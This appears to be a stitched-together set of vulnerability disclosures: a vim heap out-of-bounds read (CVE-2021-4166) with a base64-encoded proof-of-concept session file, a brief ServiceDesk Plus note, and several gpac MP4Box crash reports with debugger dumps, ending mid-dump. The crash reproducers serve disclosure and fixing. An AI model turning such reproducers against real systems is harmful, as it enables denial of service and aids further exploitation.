**Description**

A heap-based OOB read of size 4 occurs when a user tries to open a vim session file specified below. This happens regarless of any command line options that could be specified to restrict vim, such `-Z` and `-m`. This bug has been found on default vim build in Ubuntu 20.04 for x86\_64/amd64.

**Proof of Concept****Steps to reproduce:**

1.  Clone the repo and build with ASAN.
    
2.  Recreate POC session:
    

    echo -ne "MDAwMDAwbjAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAgMDAwMDAwMCAwMDAwMCAwIDAwMDAwMDAgMDAwCmF1ISogMCBuMAphbA==" | base64 -d >  min_read_4
    

Its content is:

    000000n0000000000000000000000000000000000000000000000 0000000 00000 0 0000000 000
    au!* 0 n0
    

3.  Load session:

    ./vim -u NONE -i NONE -n -X -Z -e -m -s -S ./min_read_4 -c ':qa!'
    

Sanitizer output:

    =================================================================
    ==4102472==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6070000003f8 at pc 0x00000049228a bp 0x7ffeb530bdd0 sp 0x7ffeb530bdc8
    READ of size 4 at 0x6070000003f8 thread T0
        #0 0x492289 in alist_name /home/octa/fuzzing_vim/vim_laf_asan/src/arglist.c:877:30
        #1 0x492289 in do_arg_all /home/octa/fuzzing_vim/vim_laf_asan/src/arglist.c:1138:23
        #2 0x492289 in ex_all /home/octa/fuzzing_vim/vim_laf_asan/src/arglist.c:1188:5
        #3 0xcbcf56 in do_one_cmd /home/octa/fuzzing_vim/vim_laf_asan/src/ex_docmd.c:2572:2
        #4 0xcbcf56 in do_cmdline /home/octa/fuzzing_vim/vim_laf_asan/src/ex_docmd.c:994:17
        #5 0x1eb3e64 in do_source /home/octa/fuzzing_vim/vim_laf_asan/src/scriptfile.c:1420:5
        #6 0x1ed7c97 in cmd_source /home/octa/fuzzing_vim/vim_laf_asan/src/scriptfile.c:985:14
        #7 0x1ed7c97 in ex_source /home/octa/fuzzing_vim/vim_laf_asan/src/scriptfile.c:1011:2
        #8 0xcbcf56 in do_one_cmd /home/octa/fuzzing_vim/vim_laf_asan/src/ex_docmd.c:2572:2
        #9 0xcbcf56 in do_cmdline /home/octa/fuzzing_vim/vim_laf_asan/src/ex_docmd.c:994:17
        #10 0x2e24e95 in do_cmdline_cmd /home/octa/fuzzing_vim/vim_laf_asan/src/ex_docmd.c:588:12
        #11 0x2e24e95 in exe_commands /home/octa/fuzzing_vim/vim_laf_asan/src/main.c:3084:2
        #12 0x2e24e95 in vim_main2 /home/octa/fuzzing_vim/vim_laf_asan/src/main.c:775:6
        #13 0x2e13f06 in main /home/octa/fuzzing_vim/vim_laf_asan/src/main.c:426:12
        #14 0x7ff4cc80f0b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
        #15 0x3aa0bd in _start (/home/octa/fuzzing_vim/vim_laf_asan/src/vim+0x3aa0bd)
    
    0x6070000003f8 is located 8 bytes to the right of 80-byte region [0x6070000003a0,0x6070000003f0)
    allocated by thread T0 here:
        #0 0x424449 in realloc (/home/octa/fuzzing_vim/vim_laf_asan/src/vim+0x424449)
        #1 0x45fe4d in ga_grow_inner /home/octa/fuzzing_vim/vim_laf_asan/src/alloc.c:735:10
    
    SUMMARY: AddressSanitizer: heap-buffer-overflow /home/octa/fuzzing_vim/vim_laf_asan/src/arglist.c:877:30 in alist_name
    Shadow bytes around the buggy address:
      0x0c0e7fff8020: fd fd fd fd fd fd fd fd fd fa fa fa fa fa fd fd
      0x0c0e7fff8030: fd fd fd fd fd fd fd fa fa fa fa fa fd fd fd fd
      0x0c0e7fff8040: fd fd fd fd fd fa fa fa fa fa fd fd fd fd fd fd
      0x0c0e7fff8050: fd fd fd fa fa fa fa fa fd fd fd fd fd fd fd fd
      0x0c0e7fff8060: fd fd fa fa fa fa fd fd fd fd fd fd fd fd fd fd
    =>0x0c0e7fff8070: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 fa[fa]
      0x0c0e7fff8080: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c0e7fff8090: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c0e7fff80a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c0e7fff80b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c0e7fff80c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    ==4102472==ABORTING
    

**Impact**

This vulnerability is capable disclosing data and might lead to bypass protection mechanisms facilitating successful exploitation of other memory corruption vulnerabilities that may lead to code execution.

**Acknowledgements**

This bug was found by Octavio Gianatiempo (ogianatiempo@faradaysec.com) and Octavio Galland (ogalland@faradaysec.com) from Faraday Research Team.

CVE-2021-4166: Out-of-bounds Read in vim

Zoho ManageEngine ServiceDesk Plus before 12003 allows authentication bypass in certain admin configurations.

CVE-2021-44526: ServiceDesk Plus readme | Service desk release notes | ServiceDesk Plus latest version read me notes | IT service management release notes | Service desk current version

A null pointer dereference vulnerability exists in gpac 1.1.0 in the lsr_read_id.part function, which causes a segmentation fault and application crash.

CVE-2021-45260: Null Pointer Dereference in lsr_read_id.part() · Issue #1979 · gpac/gpac

A null pointer dereference vulnerability exists in gpac 1.1.0 via the lsr_read_anim_values_ex function, which causes a segmentation fault and application crash.

Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you!

*   I looked for a similar issue and couldn't find any.
*   I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/
*   I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop\_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95

Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/

A null pointer dereference was discovered in lsr\_read\_anim\_values\_ex(). The vulnerability causes a segmentation fault and application crash.

**Version:**

    MP4Box - GPAC version 1.1.0-DEV-rev1555-g339e7a736-master
    (c) 2000-2021 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io
    
    Please cite our work in your research:
            GPAC Filters: https://doi.org/10.1145/3339825.3394929
            GPAC: https://doi.org/10.1145/1291233.1291452
    
    GPAC Configuration: --prefix=/root/fuck_bin/gpac/test
    Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_JPEG GPAC_HAS_PNG GPAC_HAS_LINUX_DVB  GPAC_DISABLE_3D
    

**System information**  
Ubuntu 20.04 focal, AMD EPYC 7742 64-Core @ 16x 2.25GHz

**command:**

lsr\_read\_anim\_values\_ex.part-lsr\_read\_animateTransform.zip

**Result**

lsr\_read\_anim\_values\_ex.part-lsr\_read\_animateTransform/id:000439,si  
g:11,src:004575+004803,op:splice,rep:2

     ../../test/lib/MP4Box -bt lsr_read_anim_values_ex.part-lsr_read_animateTransform/id:000439,si
    g:11,src:004575+004803,op:splice,rep:2
    [iso file] extra box maxr found in hinf, deleting
    [iso file] extra box maxr found in hinf, deleting
    [iso file] Unknown box type 80rak in parent moov
    [iso file] Incomplete box mdat - start 11495 size 853091
    [iso file] Incomplete file while reading for dump - aborting parsing
    [iso file] extra box maxr found in hinf, deleting
    [iso file] extra box maxr found in hinf, deleting
    [iso file] Unknown box type 80rak in parent moov
    [iso file] Incomplete box mdat - start 11495 size 853091
    [iso file] Incomplete file while reading for dump - aborting parsing
    MPEG-4 LASeR Scene Parsing
    [LASeR] memory overread - corrupted decoding
    [1]    1634950 segmentation fault  ../../test/lib/MP4Box -bt
    

**gdb**

lsr\_read\_anim\_values\_ex.part-lsr\_read\_animateTransform/id:000439,si  
g:11,src:004575+004803,op:splice,rep:2

    Program received signal SIGSEGV, Segmentation fault.
    0x00007ffff7b551a6 in lsr_read_anim_values_ex.part () from /root/fuck_bin/gpac/test/lib/libgpac.so.10
    LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
    ────────────────────────────────────────────[ REGISTERS ]─────────────────────────────────────────────
     RAX  0x0
     RBX  0x5
     RCX  0x5555555c6010 ◂— 0x70006
     RDX  0x6
     RDI  0x5555556e4020 ◂— 0x0
     RSI  0x1
     R8   0x5555556e4000 ◂— 0x0
     R9   0x0
     R10  0x7ffff7759e4a ◂— 'gf_list_insert'
     R11  0x206
     R12  0x5555555e1020 ◂— 0x54 /* 'T' */
     R13  0x5555556e4000 ◂— 0x0
     R14  0x5555555e35c0 —▸ 0x5555555e3630 ◂— 0x0
     R15  0x5555556e4020 ◂— 0x0
     RBP  0x3
     RSP  0x7fffffff6c90 ◂— 0xf00000003
     RIP  0x7ffff7b551a6 (lsr_read_anim_values_ex.part+1078) ◂— movss  xmm0, dword ptr [rax]
    ──────────────────────────────────────────────[ DISASM ]──────────────────────────────────────────────
     ► 0x7ffff7b551a6 <lsr_read_anim_values_ex.part+1078>    movss  xmm0, dword ptr [rax]
       0x7ffff7b551aa <lsr_read_anim_values_ex.part+1082>    movss  dword ptr [r13 + 8], xmm0
       0x7ffff7b551b0 <lsr_read_anim_values_ex.part+1088>    call   gf_list_get@plt                <gf_list_get@plt>
    
       0x7ffff7b551b5 <lsr_read_anim_values_ex.part+1093>    test   rax, rax
       0x7ffff7b551b8 <lsr_read_anim_values_ex.part+1096>    je     lsr_read_anim_values_ex.part+1108                <lsr_read_anim_values_ex.part+1108>
    
       0x7ffff7b551ba <lsr_read_anim_values_ex.part+1098>    movss  xmm0, dword ptr [rax]
       0x7ffff7b551be <lsr_read_anim_values_ex.part+1102>    movss  dword ptr [r13], xmm0
       0x7ffff7b551c4 <lsr_read_anim_values_ex.part+1108>    mov    esi, 2
       0x7ffff7b551c9 <lsr_read_anim_values_ex.part+1113>    mov    rdi, r15
       0x7ffff7b551cc <lsr_read_anim_values_ex.part+1116>    call   gf_list_get@plt                <gf_list_get@plt>
    
       0x7ffff7b551d1 <lsr_read_anim_values_ex.part+1121>    test   rax, rax
    ──────────────────────────────────────────────[ STACK ]───────────────────────────────────────────────
    00:0000│ rsp 0x7fffffff6c90 ◂— 0xf00000003
    01:0008│     0x7fffffff6c98 ◂— 0x7fff00000008
    02:0010│     0x7fffffff6ca0 ◂— 0x350000006e /* 'n' */
    03:0018│     0x7fffffff6ca8 —▸ 0x5555555e1020 ◂— 0x54 /* 'T' */
    04:0020│     0x7fffffff6cb0 ◂— 0x0
    05:0028│     0x7fffffff6cb8 —▸ 0x5555555e0f00 —▸ 0x5555555e0f20 —▸ 0x5555555e0f60 —▸ 0x5555555e0f40 ◂— ...
    06:0030│     0x7fffffff6cc0 ◂— 0x0
    07:0038│     0x7fffffff6cc8 ◂— 0x2748627e3b91600
    ────────────────────────────────────────────[ BACKTRACE ]─────────────────────────────────────────────
     ► f 0   0x7ffff7b551a6 lsr_read_anim_values_ex.part+1078
       f 1   0x7ffff7b5d9e8 lsr_read_animateTransform+424
       f 2   0x7ffff7b5beeb lsr_read_scene_content_model+1547
       f 3   0x7ffff7b5c89c lsr_read_group_content.part+316
       f 4   0x7ffff7b60a76 lsr_read_svg+838
       f 5   0x7ffff7b58817 lsr_read_command_list+759
       f 6   0x7ffff7b5ab74 lsr_decode_laser_unit+708
       f 7   0x7ffff7b6239d gf_laser_decode_command_list+333
    ──────────────────────────────────────────────────────────────────────────────────────────────────────
    pwndbg> bt
    #0  0x00007ffff7b551a6 in lsr_read_anim_values_ex.part () from /root/fuck_bin/gpac/test/lib/libgpac.so.10
    #1  0x00007ffff7b5d9e8 in lsr_read_animateTransform () from /root/fuck_bin/gpac/test/lib/libgpac.so.10
    #2  0x00007ffff7b5beeb in lsr_read_scene_content_model () from /root/fuck_bin/gpac/test/lib/libgpac.so.10
    #3  0x00007ffff7b5c89c in lsr_read_group_content.part () from /root/fuck_bin/gpac/test/lib/libgpac.so.10
    #4  0x00007ffff7b60a76 in lsr_read_svg () from /root/fuck_bin/gpac/test/lib/libgpac.so.10
    #5  0x00007ffff7b58817 in lsr_read_command_list () from /root/fuck_bin/gpac/test/lib/libgpac.so.10
    #6  0x00007ffff7b5ab74 in lsr_decode_laser_unit () from /root/fuck_bin/gpac/test/lib/libgpac.so.10
    #7  0x00007ffff7b6239d in gf_laser_decode_command_list () from /root/fuck_bin/gpac/test/lib/libgpac.so.10
    #8  0x00007ffff7aa3061 in gf_sm_load_run_isom () from /root/fuck_bin/gpac/test/lib/libgpac.so.10
    #9  0x00005555555844a8 in dump_isom_scene ()
    #10 0x000055555557b42c in mp4boxMain ()
    #11 0x00007ffff75630b3 in __libc_start_main (main=0x55555556c420 <main>, argc=3, argv=0x7fffffffe1c8, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe1b8) at ../csu/libc-start.c:308
    #12 0x000055555556c45e in _start ()

CVE-2021-45266: Null Pointer Dereference in lsr_read_anim_values_ex() · Issue #1985 · gpac/gpac

An invalid memory address dereference vulnerability exists in gpac 1.1.0 via the svg_node_start function, which causes a segmentation fault and application crash.

Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you!

*   I looked for a similar issue and couldn't find any.
*   I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/
*   I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop\_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95

Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/

An invalid memory address dereference was discovered in svg\_node\_start(). The vulnerability causes a segmentation fault and application crash.

**Version:**

    MP4Box - GPAC version 1.1.0-DEV-revUNKNOWN_REV
    (c) 2000-2021 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io
    
    Please cite our work in your research:
            GPAC Filters: https://doi.org/10.1145/3339825.3394929
            GPAC: https://doi.org/10.1145/1291233.1291452
    
    GPAC Configuration:
    Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_JPEG GPAC_HAS_PNG GPAC_HAS_LINUX_DVB  GPAC_DISABLE_3D
    

**System information**  
Ubuntu 20.04 focal, AMD EPYC 7742 64-Core @ 16x 2.25GHz

**command:**

poc\_2.zip

**Result**

    [Parser] LASeR Scene Parsing: ./poc/poc_2.xsr
    [1]    75845 segmentation fault  ./MP4Box -lsr ./poc/poc_2.xsr
    

**gdb**

    Program received signal SIGSEGV, Segmentation fault.
    0x00007ffff7aa5f97 in svg_node_start () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10
    LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
    ────────────────────────────────────────────[ REGISTERS ]─────────────────────────────────────────────
     RAX  0x0
     RBX  0x5555555c7750 ◂— 0x0
     RCX  0x0
     RDX  0x5555555ce2b0 —▸ 0x5555555ce0e3 ◂— 0x7572742200706172 /* 'rap' */
     RDI  0x7ffff7e447c9 ◂— 'Unable to parse chunk: %s'
     RSI  0x5555555ce0e3 ◂— 0x7572742200706172 /* 'rap' */
     R8   0x7fffffff5c3c ◂— 0x0
     R9   0x5555555ce0e3 ◂— 0x7572742200706172 /* 'rap' */
     R10  0x0
     R11  0x0
     R12  0x5555555ce2b0 —▸ 0x5555555ce0e3 ◂— 0x7572742200706172 /* 'rap' */
     R13  0x5555555ce0d5 ◂— 0x6e65637300666173 /* 'saf' */
     R14  0x1
     R15  0x0
     RBP  0x5555555cf390 —▸ 0x7fffffff7310 ◂— 0x7
     RSP  0x7fffffff5bb0 ◂— 0x0
     RIP  0x7ffff7aa5f97 (svg_node_start+3095) ◂— mov    rdi, qword ptr [rax + 0x20]
    ──────────────────────────────────────────────[ DISASM ]──────────────────────────────────────────────
     ► 0x7ffff7aa5f97 <svg_node_start+3095>    mov    rdi, qword ptr [rax + 0x20]
       0x7ffff7aa5f9b <svg_node_start+3099>    call   gf_list_count@plt                <gf_list_count@plt>
    
       0x7ffff7aa5fa0 <svg_node_start+3104>    test   eax, eax
       0x7ffff7aa5fa2 <svg_node_start+3106>    sete   r15b
       0x7ffff7aa5fa6 <svg_node_start+3110>    test   r14d, r14d
       0x7ffff7aa5fa9 <svg_node_start+3113>    jne    svg_node_start+6240                <svg_node_start+6240>
    
       0x7ffff7aa5faf <svg_node_start+3119>    xor    esi, esi
       0x7ffff7aa5fb1 <svg_node_start+3121>    nop    dword ptr [rax]
       0x7ffff7aa5fb8 <svg_node_start+3128>    mov    rdi, qword ptr [rbp + 0x50]
       0x7ffff7aa5fbc <svg_node_start+3132>    mov    edx, r15d
       0x7ffff7aa5fbf <svg_node_start+3135>    pxor   xmm0, xmm0
    ──────────────────────────────────────────────[ STACK ]───────────────────────────────────────────────
    00:0000│ rsp 0x7fffffff5bb0 ◂— 0x0
    01:0008│     0x7fffffff5bb8 —▸ 0x5555555ce0d9 ◂— 'sceneUnit'
    02:0010│     0x7fffffff5bc0 ◂— 0x0
    03:0018│     0x7fffffff5bc8 ◂— 0x0
    04:0020│     0x7fffffff5bd0 —▸ 0x5555555ce0d5 ◂— 0x6e65637300666173 /* 'saf' */
    05:0028│     0x7fffffff5bd8 ◂— 0x0
    06:0030│     0x7fffffff5be0 ◂— 0x0
    07:0038│     0x7fffffff5be8 ◂— 0x3000000020 /* ' ' */
    ────────────────────────────────────────────[ BACKTRACE ]─────────────────────────────────────────────
     ► f 0   0x7ffff7aa5f97 svg_node_start+3095
       f 1   0x7ffff781fbc5 xml_sax_node_start+453
       f 2   0x7ffff7820e6c xml_sax_parse+3596
       f 3   0x7ffff78213d6 gf_xml_sax_parse_intern+950
       f 4   0x7ffff7821595 gf_xml_sax_parse+165
       f 5   0x7ffff7821633 xml_sax_read_file.part+115
       f 6   0x7ffff7821927 gf_xml_sax_parse_file+295
       f 7   0x7ffff7aa42da load_svg_run+58
    ──────────────────────────────────────────────────────────────────────────────────────────────────────
    pwndbg> bt
    #0  0x00007ffff7aa5f97 in svg_node_start () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10
    #1  0x00007ffff781fbc5 in xml_sax_node_start () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10
    #2  0x00007ffff7820e6c in xml_sax_parse () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10
    #3  0x00007ffff78213d6 in gf_xml_sax_parse_intern () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10
    #4  0x00007ffff7821595 in gf_xml_sax_parse () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10
    #5  0x00007ffff7821633 in xml_sax_read_file.part () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10
    #6  0x00007ffff7821927 in gf_xml_sax_parse_file () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10
    #7  0x00007ffff7aa42da in load_svg_run () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10
    #8  0x00005555555844a8 in dump_isom_scene ()
    #9  0x000055555557b42c in mp4boxMain ()
    #10 0x00007ffff75630b3 in __libc_start_main (main=0x55555556c420 <main>, argc=3, argv=0x7fffffffe188, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe178) at ../csu/libc-start.c:308
    #11 0x000055555556c45e in _start ()

CVE-2021-45267: Invalid memory address dereference in svg_node_start() · Issue #1965 · gpac/gpac

An invalid free vulnerability exists in gpac 1.1.0 via the gf_sg_command_del function, which causes a segmentation fault and application crash.

Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you!

*   I looked for a similar issue and couldn't find any.
*   I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/
*   I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop\_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95

Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/

An invalid free was discovered in gf\_sg\_command\_del(). The vulnerability causes a segmentation fault and application crash.

**Version:**

    MP4Box - GPAC version 1.1.0-DEV-revUNKNOWN_REV
    (c) 2000-2021 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io
    
    Please cite our work in your research:
            GPAC Filters: https://doi.org/10.1145/3339825.3394929
            GPAC: https://doi.org/10.1145/1291233.1291452
    
    GPAC Configuration:
    Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_JPEG GPAC_HAS_PNG GPAC_HAS_LINUX_DVB  GPAC_DISABLE_3D
    

**System information**  
Ubuntu 20.04 focal, AMD EPYC 7742 64-Core @ 16x 2.25GHz

**command:**

    ./MP4Box -bt ./poc/poc_17
    

poc\_17.zip

**Result**

    [iso file] extra box maxr found in hinf, deleting
    [iso file] extra box maxr found in hinf, deleting
    [iso file] Unknown box type 80rak in parent moov
    [iso file] Unknown box type prl  in parent dref
    [iso file] Incomplete box mdat - start 11495 size 860323
    [iso file] Incomplete file while reading for dump - aborting parsing
    [iso file] extra box maxr found in hinf, deleting
    [iso file] extra box maxr found in hinf, deleting
    [iso file] Unknown box type 80rak in parent moov
    [iso file] Unknown box type prl  in parent dref
    [iso file] Incomplete box mdat - start 11495 size 860323
    [iso file] Incomplete file while reading for dump - aborting parsing
    MPEG-4 LASeR Scene Parsing
    [LASeR] memory overread - corrupted decoding
    [LASeR] memory overread - corrupted decoding
    [MP4 Loading] decoding sample 1 from track ID 8 failed
    free(): invalid pointer
    [1]    3334251 abort      ./MP4Box -bt ./poc/poc_17
    

**gdb**

    free(): invalid pointer
    
    Program received signal SIGABRT, Aborted.
    __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:50
    50      ../sysdeps/unix/sysv/linux/raise.c: No such file or directory.
    LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
    ───────────────────────────────[ REGISTERS ]────────────────────────────────
     RAX  0x0
     RBX  0x7ffff72bf040 ◂— 0x7ffff72bf040
     RCX  0x7ffff758218b (raise+203) ◂— mov    rax, qword ptr [rsp + 0x108]
     RDX  0x0
     RDI  0x2
     RSI  0x7fffffff6f20 ◂— 0x0
     R8   0x0
     R9   0x7fffffff6f20 ◂— 0x0
     R10  0x8
     R11  0x246
     R12  0x7fffffff7190 ◂— 0x0
     R13  0x10
     R14  0x7ffff7ffb000 ◂— 0x6565726600001000
     R15  0x1
     RBP  0x7fffffff7270 —▸ 0x5555555df1e0 —▸ 0x5555555d4370 ◂— 0x0
     RSP  0x7fffffff6f20 ◂— 0x0
     RIP  0x7ffff758218b (raise+203) ◂— mov    rax, qword ptr [rsp + 0x108]
    ───────────────────────────────────────[ DISASM ]────────────────────────────────────────
     ► 0x7ffff758218b <raise+203>    mov    rax, qword ptr [rsp + 0x108]
       0x7ffff7582193 <raise+211>    xor    rax, qword ptr fs:[0x28]
       0x7ffff758219c <raise+220>    jne    raise+260                <raise+260>
        ↓
       0x7ffff75821c4 <raise+260>    call   __stack_chk_fail                <__stack_chk_fail>
    
       0x7ffff75821c9                nop    dword ptr [rax]
       0x7ffff75821d0 <killpg>       endbr64
       0x7ffff75821d4 <killpg+4>     test   edi, edi
       0x7ffff75821d6 <killpg+6>     js     killpg+16                <killpg+16>
    
       0x7ffff75821d8 <killpg+8>     neg    edi
       0x7ffff75821da <killpg+10>    jmp    kill                <kill>
    
       0x7ffff75821df <killpg+15>    nop
    ────────────────────────────────────────[ STACK ]────────────────────────────────────────
    00:0000│ rsi r9 rsp 0x7fffffff6f20 ◂— 0x0
    01:0008│            0x7fffffff6f28 —▸ 0x7ffff77534c8 ◂— 0xe001200003748 /* 'H7' */
    02:0010│            0x7fffffff6f30 —▸ 0x7fffffff72f0 —▸ 0x5555555d47a0 —▸ 0x5555555d4370 ◂— 0x0
    03:0018│            0x7fffffff6f38 —▸ 0x7ffff7fe7c2e ◂— mov    r11, rax
    04:0020│            0x7fffffff6f40 ◂— 0x0
    05:0028│            0x7fffffff6f48 ◂— 0x0
    06:0030│            0x7fffffff6f50 —▸ 0x5555555df390 —▸ 0x5555555df3f0 —▸ 0x5555555df0f0 ◂— 0x0
    07:0038│            0x7fffffff6f58 ◂— 0x0
    ──────────────────────────────────────[ BACKTRACE ]──────────────────────────────────────
     ► f 0   0x7ffff758218b raise+203
       f 1   0x7ffff7561859 abort+299
       f 2   0x7ffff75cc3ee __libc_message+670
       f 3   0x7ffff75d447c
       f 4   0x7ffff75d5cac _int_free+748
       f 5   0x7ffff784f461 gf_sg_command_del+353
       f 6   0x7ffff7a88203 gf_sm_del+195
       f 7   0x555555584423 dump_isom_scene+627
    ─────────────────────────────────────────────────────────────────────────────────────────
    

`break gf_svg_delete_attribute_value`

    pwndbg>
    0x00007ffff784f45c in gf_sg_command_del () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10
    LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
    ───────────────────────────────[ REGISTERS ]────────────────────────────────
     RAX  0x0
     RBX  0x0
     RCX  0x5555555df310 ◂— 0x0
    *RDX  0x5555555d4370 ◂— 0x0
     RDI  0x0
     RSI  0x5555555df300 ◂— 0x0
     R8   0x2
     R9   0xfffffff6
     R10  0x7ffff775ba72 ◂— 'gf_node_unregister_children'
     R11  0x7ffff784a6d0 (gf_node_unregister_children) ◂— endbr64
     R12  0x5555555df2e0 ◂— 0x0
     R13  0x5555555d47a0 —▸ 0x5555555d4370 ◂— 0x0
     R14  0x5555555d4370 ◂— 0x0
     R15  0x0
     RBP  0x5555555df1e0 —▸ 0x5555555d4370 ◂— 0x0
     RSP  0x7fffffff7310 ◂— 0x1
    *RIP  0x7ffff784f45c (gf_sg_command_del+348) ◂— call   0x7ffff78c7fb0
    ───────────────────────────────────────[ DISASM ]────────────────────────────────────────
       0x7ffff784f449 <gf_sg_command_del+329>    mov    rsi, qword ptr [r12 + 8]
       0x7ffff784f44e <gf_sg_command_del+334>    test   rsi, rsi
       0x7ffff784f451 <gf_sg_command_del+337>    je     gf_sg_command_del+255
    <gf_sg_command_del+255>
    
       0x7ffff784f453 <gf_sg_command_del+339>    mov    edi, dword ptr [r12 + 4]
       0x7ffff784f458 <gf_sg_command_del+344>    mov    rdx, qword ptr [rbp]
     ► 0x7ffff784f45c <gf_sg_command_del+348>    call   gf_svg_delete_attribute_value                <gf_svg_delete_attribute_value>
            rdi: 0x0
            rsi: 0x5555555df300 ◂— 0x0
            rdx: 0x5555555d4370 ◂— 0x0
            rcx: 0x5555555df310 ◂— 0x0
    
       0x7ffff784f461 <gf_sg_command_del+353>    jmp    gf_sg_command_del+255
    <gf_sg_command_del+255>
    
       0x7ffff784f463 <gf_sg_command_del+355>    nop    dword ptr [rax + rax]
       0x7ffff784f468 <gf_sg_command_del+360>    mov    rdi, qword ptr [r12 + 8]
       0x7ffff784f46d <gf_sg_command_del+365>    test   rdi, rdi
       0x7ffff784f470 <gf_sg_command_del+368>    je     gf_sg_command_del+384
    <gf_sg_command_del+384>
    ────────────────────────────────────────[ STACK ]────────────────────────────────────────
    00:0000│ rsp 0x7fffffff7310 ◂— 0x1
    01:0008│     0x7fffffff7318 ◂— 0x5cf4ff747866de00
    02:0010│     0x7fffffff7320 —▸ 0x7fffffff7340 —▸ 0x5555555df1e0 —▸ 0x5555555d4370 ◂— 0x0
    03:0018│     0x7fffffff7328 —▸ 0x5555555defe0 ◂— 0x8
    04:0020│     0x7fffffff7330 —▸ 0x5555555df130 ◂— 0x0
    05:0028│     0x7fffffff7338 —▸ 0x7ffff7a88203 (gf_sm_del+195) ◂— jmp    0x7ffff7a881c8
    06:0030│     0x7fffffff7340 —▸ 0x5555555df1e0 —▸ 0x5555555d4370 ◂— 0x0
    07:0038│     0x7fffffff7348 ◂— 0x5cf4ff747866de00
    ──────────────────────────────────────[ BACKTRACE ]──────────────────────────────────────
     ► f 0   0x7ffff784f45c gf_sg_command_del+348
       f 1   0x7ffff7a88203 gf_sm_del+195
       f 2   0x555555584423 dump_isom_scene+627
       f 3   0x55555557b42c mp4boxMain+9228
       f 4   0x7ffff75630b3 __libc_start_main+243
    ─────────────────────────────────────────────────────────────────────────────────────────
    pwndbg>
    free(): invalid pointer
    
    Program received signal SIGABRT, Aborted.
    __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:50
    50      ../sysdeps/unix/sysv/linux/raise.c: No such file or directory.
    LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
    ───────────────────────────────[ REGISTERS ]────────────────────────────────
     RAX  0x0
    *RBX  0x7ffff72bf040 ◂— 0x7ffff72bf040
    *RCX  0x7ffff758218b (raise+203) ◂— mov    rax, qword ptr [rsp + 0x108]
    *RDX  0x0
    *RDI  0x2
    *RSI  0x7fffffff6f20 ◂— 0x0
    *R8   0x0
    *R9   0x7fffffff6f20 ◂— 0x0
    *R10  0x8
    *R11  0x246
